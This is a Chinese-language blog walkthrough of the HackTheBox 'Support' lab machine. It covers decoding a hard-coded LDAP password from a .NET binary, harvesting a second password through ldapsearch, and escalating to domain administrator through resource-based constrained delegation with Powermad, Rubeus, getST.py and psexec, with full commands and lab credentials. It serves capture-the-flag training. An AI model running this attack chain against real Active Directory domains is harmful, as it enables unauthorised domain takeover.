HackTheBox | Support

原创 已于 2023-03-13 21:10:51 修改 · 464 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#windows #java #jvm

于 2023-03-13 14:03:20 首次发布
本文描述了一次针对域控服务器的安全分析过程,包括nmap扫描、smb服务发现、解密密码、ldapsearch查询、evil-winrm登录、利用bloodhound收集信息以及RBCD(基于资源的约束委派)权限提权的步骤。通过创建和配置机器账户,最终实现了权限升级。

nmap扫描,目标主机明显为域控,主机名为DC,域名为support.htb

image-20230310091146712

访问smb服务,看到一些路径

image-20230310135112883

访问support-tools

image-20230310135143149

下载UserInfo.exe.zip并解压,看到一些exe和dll文件,还有一个config文件

image-20230310135700311

image-20230310135726539

使用IDA打开UserInfo.exe,看到存在getPassword函数,其中有个UserInfo.Services.Protected::enc_passwordUserInfo.Services.Protected::key

image-20230310142932501

检查enc_password的交叉引用

image-20230310143141713

image-20230310143156561

得到加密后的密码,变量名为a0nv32ptwgyjzg9,值为0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E。另外看到一个armando,可能是用户名。以及LDAP://support.htb

image-20230310143326560

大概看了一下对应函数的代码逻辑,应该是使用Bytes类型的armando对ASCII码类型的字符串进行了加密

image-20230310151214316

image-20230310153858678

借助GPT分析代码,大概就是使用key中的字符对字符串进行异或加密,中间增加了对0XDF的异或

将局部变量1、2、0依次压入堆栈
将堆栈上的第二个元素(局部变量0)作为数组,将第一个元素(局部变量2)作为索引,取出数组中的元素并压入堆栈
将UserInfo.Services.Protected类的静态字段key(一个字节数组)压入堆栈
将局部变量2压入堆栈
将UserInfo.Services.Protected类的静态字段key(一个字节数组)压入堆栈
取出数组的长度并转换为int32类型,压入堆栈
计算堆栈上的两个元素(局部变量2和key数组的长度)的余数,并压入堆栈
将堆栈上的第二个元素(key数组)作为数组,将第一个元素(余数)作为索引,取出数组中的元素并压入堆栈
计算堆栈上的两个元素(数组中的两个字节)的异或,并压入堆栈
将常数0xDF压入堆栈
计算堆栈上的两个元素(异或结果和常数0xDF)的异或,并转换为uint8类型,压入堆栈
将堆栈上的第三个元素(局部变量0)作为数组,将第二个元素(局部变量2)作为索引,将第一个元素(uint8值)存储到数组中对应位置
将局部变量2压入堆栈
将常数1压入堆栈
计算堆栈上的两个元素(局部变量2和常数1)相加,并存储到局部变量2

解密得到初始字符串nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz

import base64

c = base64.b64decode("0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E")
k = b"armando"

result = ""
for i in range(len(c)):
    result += chr(c[i] ^ k[i%len(k)] ^ 223)

print(result)

从代码中看到对应的用户应该是support\ldap

image-20230310160202214

使用ldapsearch进行查询

ldapsearch -x -H ldap://10.10.11.174 -D 'support\ldap' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b 'DC=support,DC=htb'

在结果中发现疑似support用户的密码Ironside47pleasure40Watchful

image-20230310161637197

使用evil-winrm登录,拿到用户flag

image-20230310161752567

使用bloodhound信息收集,看到support用户具备Shared Support Account组的权限,查看帮助信息,看到利用基于资源的约束委派攻击进行提权

image-20230310165326814 image-20230310170525878

RBCD的利用条件有2个,首先是具备修改主机msDS-AllowedToActOnBehalfOfOtherIdentity的权限,其次是拥有一个机器账户的权限。在本次实验环境中,Shared Support Account 组具备对域主机DC的generic all的权限,而用户support隶属于该组,所以可以修改主机权限;而一个域用户最多可以创建10个机器账户,所以可以手动创建机器账户。

使用工具PowerView.ps1:https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1

检查与用户创建机器用户的数量,符合默认10个

Get-DomainObject -Identity 'DC=SUPPORT,DC=HTB' | select ms-ds-machineaccountquota

image-20230310185052163

检查主机的msDS-AllowedToActOnBehalfOfOtherIdentity权限,可以看到值为空

Get-DomainComputer DC | select name,msds-allowedtoactonbehalfofotheridentity | fl

image-20230310185127636

使用工具Powermad.ps1:https://raw.githubusercontent.com/Kevin-Robertson/Powermad/master/Powermad.ps1

创建机器账户

New-MachineAccount -MachineAccount FAKE -Password $(ConvertTo-SecureString 'Password123' -AsPlainText -Force)

image-20230310185445943

检查创建的机器账户

Get-ADComputer -identity FAKE

image-20230310185525514

使用Powerview中的功能为机器账户设置约束委派的权限,目的是设置DC主机msds-allowedtoactonbehalfofotheridentity的值

Set-ADComputer -Identity DC -PrincipalsAllowedToDelegateToAccount FAKE$

检查是否设置成功

Get-DomainComputer DC | select msds-allowedtoactonbehalfofotheridentity

image-20230310191551828

获取创建的机器账户的HASH

./Rubeus.exe hash /password:Password123 /user:FAKE$ /domain:support.htb

image-20230310192302393

创建票据

python3 getST.py -dc-ip 10.10.11.174 support/fake\$:Password123 -spn cifs/dc.support.htb -impersonate administrator

image-20230310192836929

利用票据连接主机

export KRB5CCNAME=administrator.ccache; python3 psexec.py dc.support.htb -target-ip 10.10.11.174 -k -no-pass

image-20230310192823028

Hack the box (HTB) Metatwo靶机
qq_58869808的博客
11-05 5305
hackthebox metatwo靶机
【Hack The Box】windows练习-- support
人间体佐菲的博客
11-17 892
【Hack The Box】windows练习-- support
Hack The Box - Help Writeup
qq_23026851的博客
01-30 3245
解题过程: nmap + nikto 扫描目标机,开放22,80,3000端口。并且找到80下的support/路径。 打开http://[ip]/support,发现一个叫HelpDeskZ的应用,源码:https://github.com/evolutionscript/HelpDeskZ-1.0/。该应用的submit ticket功能可以上传任意文件。虽然有file extension...
Powermad 项目使用文档
最新发布
gitblog_00464的博客
11-21 345
``` Powermad/ ├── LICENSE ├── README.md ├── Powermad.ps1 ├── Powermad.Tests.ps1 ├── Examples/ │ ├── Example1.ps1 │ ├── Example2.ps1 │ └── ... ├── Modules/ │ ├── Module1.psm1 │ ├── Module2.ps
Hack The Box——Scavenger
江左盟的博客
03-23 1009
简介 信息收集 使用nmap 10.10.10.155 -A扫描目标主机,如图: 可以看到开启了很多端口(21,22,25,43,53,80)和对应的服务以及版本信息,操作系统是Debian,版本基本上是10.0左右了。 漏洞发现 使用searchsploit和Google搜索相关服务对应版本的漏洞,发现Exim smtpd 4.89存在远程命令执行漏洞(CVE-2017-16...
HackTheBox Support 逆向工程获取LDAP凭证,票证伪造提权
Ba1_Ma0的博客
11-07 983
"SHARED SUPPORT ACCOUNTS@SUPPORT.HTB"组对“DC.SUPPORT.HTB”具有“GenericAll”权限,我们可以访问的support用户是“SHARED SUPPORT ACCOUNTS@SUPPORT.HTB”组的成员,因此,我们给其他对象授予“DC.SUPPORT.HTB”的“GenericAll”权限,可以利用这个方法来提权。在这里可以看到用户账户的详细信息,通常来说info字段都是空的,这可能是用户的密码。使用内置的AD模块,给我们生成的计算机对象设置权限。
hackthebox - help (考点:node.js graphql查询 & helpdesk安全 & ubantu提权 )
冬萍子癸水
05-17 510
1 扫描 22想到可能有ssh登录,80是进web信息搜集,3000是node.js express,可以查询一些东西。 C:\root> nmap -A 10.10.10.121 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-16 19:56 EDT Nmap scan report for 10.10.10.121 Host is up (0.24s latency). Not shown: 997 closed ports PORT
HackTheBox YUMMY靶机渗透实录
qq_36129581的博客
10-13 1846
有22端口和80端口,22端口应该暂时用不到。80端口是http服务,可以访问看看有没有突破口。看到这个网页,能交互的都点一下,发现有个预定桌席可以交互,点进去,提交一个预定,然后进面板中,点击保存日历,发现可以下载到文件,这时想到可能可以下载到系统文件。那我们就可以借助这个操作来修改请求来请求文件。这时打开burp软件拦截网页的请求。点击save按键,查看拦截的请求。这个包没什么问题直接forward。
No.5--HackTheBox--Cap
wzwnbnb的博客
11-07 1025
Linux难度:EazyCap是一台运行HTTP服务器的简易Linux机器,该服务器执行管理功能,包括执行网络捕获。不适当的控制会导致不安全的直接对象引用(IDOR),从而允许访问其他用户的捕获。捕获包含明文凭证,可用于获得立足点。然后利用Linux功能升级到根用户。
HackTheBox-Intelligence WP
h1nt的博客
10-19 3127
0x01 端口探测 使用nmap对靶机进行探测: nmap -sV -sC 10.10.10.248 比较标准的DC端口,还多了个WEB的80。 0x02 user.txt 进WEB看看,发现在主页目录可以下载文档。主页能下载的文档文件名为2020-01-01-upload.pdf 遂写了脚本进行爆破,将所有的文档下载下来: import requests for month in range(1, 13): for day in range(1, 32):
实战HackTheBox里的Heist
知柯信安
01-01 677
首要是运行Nmap来查找主机上正在运行的服务。 # Nmap 7.70 scan initiated Wed Aug 14 21:08:24 2019 as: nmap -A -p- -oN scan 10.10.10.149 Nmap scan report for 10.10.10.149 Host is up (0.031s latency). Not s
Powermad:PowerShell MachineAccountQuota和DNS利用工具
05-24
PowerShell MachineAccountQuota和DNS利用工具 维基 博客文章 职能 MachineAccountQuota函数 默认的Active Directory ms-DS-MachineAccountQuota属性设置允许所有域用户向一个域中最多添加10个计算机帐户。 Powermad包括一组用于利用ms-DS-MachineAccountQuota的功能,而无需将实际系统附加到AD。 Get-MachineAccountAttribute 该函数可以返回在计算机帐户属性中填充的值。 例子: 从机器帐户名称“ test”获取值“ description”。 Get-MachineAccountAttribute -MachineAccount test -Attribute discription Get-MachineAccountCreator 此功能利用
记一次对HTB:support的渗透测试
s44359487yad的博客
08-02 1581
在整个过程中,用到了SMB文件共享和枚举、wireshark分析数据包、.net代码审计及ldAP密码恢复。基于资源的约束委派攻击和一些工具的使用,感兴趣的小伙伴可以尝试一下。
Kerberos 域委派攻击之基于资源的约束性委派
Adminxe的博客
03-06 950
优快云自动迁移博客文章注意区别:约束性委派 不能跨域进行委派,基于资源的约束性委派可以跨域和林如果约束性委派,必须拥有权限,该特权是敏感的,通常仅授予域管理员。为了使用户/资源更加独立,Windows Server 2012 中引入了基于资源的约束委派。基于资源的约束性委派不需要域管理员权限去设置,而是把设置属性的权限赋予给了机器自身。基于资源的约束性委派允许资源配置受信任的帐户委派给他们。基于资源的约束性委派只能在运行 ·Windows Server 2012 及以上的域控制器·上配置,
一文带你揭秘委派攻击真相
qq_62169455的博客
03-06 1336
一般来讲,域管是不会主动访问被控主机的,因此这里可以利用Windows打印系统远程协议(MS-RPRN)中的默认启动的方法,在该方法中,域用户可以使用MS-RPRN方法强制任何运行了Spooler服务的计算机通过Kerberos或者NTLM对攻击者选择的目标进行身份验证。原理:设置非约束委派的主机结合Spooler打印机服务漏洞,让域控机器DC强制访问已控的具有本地管理员权限的非约束委派机器,从而拿到域控的机器用户hash,进而控制整个域。@#45),使用Powermad.ps1脚本来创建​​​​​​​。
135&136-横向移动&非约束委派&约束委派&资源约束委派&数据库攻防
dreamer292的博客
08-24 882
约束委派相关的知识是域内很重要的点
域渗透之委派攻击全集
include_voidmain的博客
08-22 642
域渗透之委派攻击全集
[HTB]HackTheBox-Pandora 渗透实战靶场
热门推荐
学习记录!大佬速速离开
04-17 1万+
🧟无风祭酒🧟 小医救人😈大医济世 ☣️先礼后兵☢️ 👻警👻 🦧文章为笔者学习所整理的内容,本意希望通过知识输出方式达到巩固、筑牢基础的效用。如若有过,还望大哥哥海涵。 微信公众号:acesec 🦾nmap扫描 🪶欢迎nmap急先锋大佬登场🛵: (nmap:“小样的!老弟一边站着,看哥哥我的表现~”) ┌──(root㉿kali)-[/home/kali/Desktop] └─# nmap -sS -p- -sC -sV -A --min-rate=5000 10.10.11...
if (mi.jffs2fsOffset == 0 || SUPPORT_SPMINIOS) { gUseJffs2 = 0; }
09-13
你提供的代码片段: ```c if (mi.jffs2fsOffset == 0 || SUPPORT_SPMINIOS) { gUseJffs2 = 0; } ``` 这段逻辑用于控制是否启用 JFFS2 文件系统支持。我们来逐项分析其含义和作用。 --- ## 🧠 逐项解析 ### ✅ 变量说明 | 变量 | 含义 | |------|------| | `mi.jffs2fsOffset` | JFFS2 文件系统在固件中的偏移地址 | | `SUPPORT_SPMINIOS` | 编译开关,表示是否支持 SPMINIOS(某种特定平台或功能) | | `gUseJffs2` | 全局变量,用于指示是否使用 JFFS2 文件系统 | --- ## 📌 逻辑分析 ```c if (mi.jffs2fsOffset == 0 || SUPPORT_SPMINIOS) { gUseJffs2 = 0; } ``` ### ✅ 条件说明 该判断表示: > 如果满足以下任意一个条件,则 **禁用 JFFS2 文件系统**(设置 `gUseJffs2 = 0`): 1. **`mi.jffs2fsOffset == 0`** → JFFS2 文件系统偏移为 0,表示没有分配空间或未启用该分区。 2. **`SUPPORT_SPMINIOS == 1`(定义了该宏)** → 当前平台或功能不支持 JFFS2,或使用其他文件系统(如 SPMINIOS 使用的文件系统)。 --- ## 🧱 使用场景 ### ✅ 场景 1:JFFS2 分区未启用 ```c mi.jffs2fsOffset = 0; ``` → 表示打包配置中没有为 JFFS2 分配空间,因此无需启用。 ### ✅ 场景 2:平台不支持 JFFS2(如 SPMINIOS) ```c #define SUPPORT_SPMINIOS 1 ``` → 表示当前平台使用 SPMINIOS 系统,可能使用其他文件系统(如 ROMFS、SquashFS 等),所以禁用 JFFS2。 --- ## 📋 示例流程 ```bash # 打包时未指定 JFFS2 文件 ./packer -b bootloader.bin -k kernel.bin -r rootfs.cramfs ``` - 工具内部没有为 `mi.jffs2fsOffset` 赋值 → 默认为 0 - 所以进入 `if` 条件 → `gUseJffs2 = 0` --- ## ✅ 小结 | 条件 | 是否启用 JFFS2 | |------|----------------| | `mi.jffs2fsOffset == 0` | ❌ 不启用 | | `SUPPORT_SPMINIOS == 1` | ❌ 不启用 | | 其他情况 | ✅ 启用 | --- ##
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值